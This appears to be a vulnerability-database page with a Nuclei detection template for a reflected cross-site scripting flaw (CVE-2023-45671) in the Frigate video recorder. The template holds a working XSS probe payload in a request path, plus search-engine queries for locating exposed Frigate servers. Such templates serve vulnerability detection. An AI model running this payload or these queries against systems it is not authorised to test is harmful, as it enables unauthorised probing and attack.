| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2023-45671 | 31 Oct 202301:20 | – | circl | |
| Frigate Cross-Site Scripting Vulnerability | 30 Oct 202300:00 | – | cnnvd | |
| CVE-2023-45671 | 30 Oct 202322:41 | – | cve | |
| CVE-2023-45671 Frigate reflected XSS through `/<camera_name>` API endpoints | 30 Oct 202322:41 | – | cvelist | |
| CVE-2023-45671 | 30 Oct 202323:15 | – | nvd | |
| CVE-2023-45671 Frigate reflected XSS through `/<camera_name>` API endpoints | 30 Oct 202322:41 | – | osv | |
| Cross site scripting | 30 Oct 202323:15 | – | prion | |
| PT-2023-29640 · Frigate · Frigate | 30 Oct 202300:00 | – | ptsecurity | |
| CVE-2023-45671 | 9 Jan 202609:27 | – | redhatcve |
id: CVE-2023-45671
info:
name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
impact: |
Authenticated attackers can inject malicious JavaScript through unsanitized camera_name path values in API endpoints to execute attacks against Frigate users when they click specially crafted links.
remediation: It has been fixed in version 0.13.0 Beta 3
reference:
- https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f
- https://nvd.nist.gov/vuln/detail/CVE-2023-45671
- https://securitylab.github.com/advisories/GHSL-2023-190_Frigate/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.7
cve-id: CVE-2023-45671
cwe-id: CWE-79
epss-score: 0.01425
epss-percentile: 0.69603
cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: frigate
product: frigate
shodan-query:
- title:"Frigate"
- http.title:"frigate"
fofa-query: title="frigate"
google-query: intitle:"frigate"
tags: cve,cve2023,frigate,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")'
- 'contains(header, "text/html")'
- 'status_code == 404'
condition: and
# digest: 4a0a00473045022100a453673d2466ff7a0bfadbd9719e75f21dbe1fa92df721ecc85fb737db03ae210220513feb5a90f645f93e40d93a80200fb286b39168b9229f78a46492049b0dd869:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation